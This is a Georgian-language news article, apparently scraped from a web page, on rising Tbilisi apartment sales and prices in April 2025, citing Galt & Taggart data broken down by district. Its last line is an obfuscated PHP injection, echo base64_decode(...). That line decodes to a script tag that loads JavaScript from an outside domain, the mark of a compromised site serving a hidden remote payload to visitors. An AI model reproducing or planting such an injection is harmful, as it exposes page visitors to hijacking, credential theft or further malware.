gorgia
jaluzi

თბილისში საცხოვრებელი უძრავი ქონების გაყიდვები გაიზარდა. კერძოდ, „გალთ ენდ თაგარტის“ პუბლიკაციის თანახმად, მიმდინარე წლის აპრილში 3 252 ბინა გაიყიდა, გასული წლის იმავე პერიოდში კი გაყიდული ბინების რაოდენობამ 3 222 შეადგინა.

კვლევის მიხედვით, საცხოვრებელი ბინების გაყიდვები გაიზარდა პირველად ბაზრებზე (1 693), ხოლო მეორად ბაზრებზე შემცირდა (1 559). ეს კი მაშინ, რომ გასული წლის აპრილში თბილისში პირველად ბაზარზე 1 446 ბინა გაიყიდა, მეორად ბაზრებზე კი 1776.

აღსანიშნავია ისიც, რომ გაყიდვებთან ერთად, გაზრდილია ფასიც. კერძოდ, 1 კვ.მ-ის საშუალო შეწონილი გასაყიდი ფასი 1 332 დოლარი იყო, ხოლო 2024 წლის აპრილში 1 278 დოლარი.

უბნების მიხედვით, საცხოვრებელი ბინების ფასი 2025 წლის აპრილში მთაწმინდაზე იყო, ხოლო ყველაზე დაბალი - ვაშლიჯვარში, კერძოდ:

მთაწმინდა - 2900 დოლარი;
ვაკე - 2 544 დოლარი;
ჩუღურეთი - 1 766 დოლარი;
საბურთალო - 1558 დოლარი;
კრწანისი - 1 499 დოლარი;
ისანი - 1393 დოლარი;
დიდუბე - 1 359 დოლარი;
ნაძალადევი - 1 169 დოლარი;
სამგორი - 1 070 დოლარი;
დიდი დიღომი - 1 051 დოლარი;
გლდანი - 1 035 დოლარი;
ვაშლიჯვარი - 1 034 დოლარი.

164
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");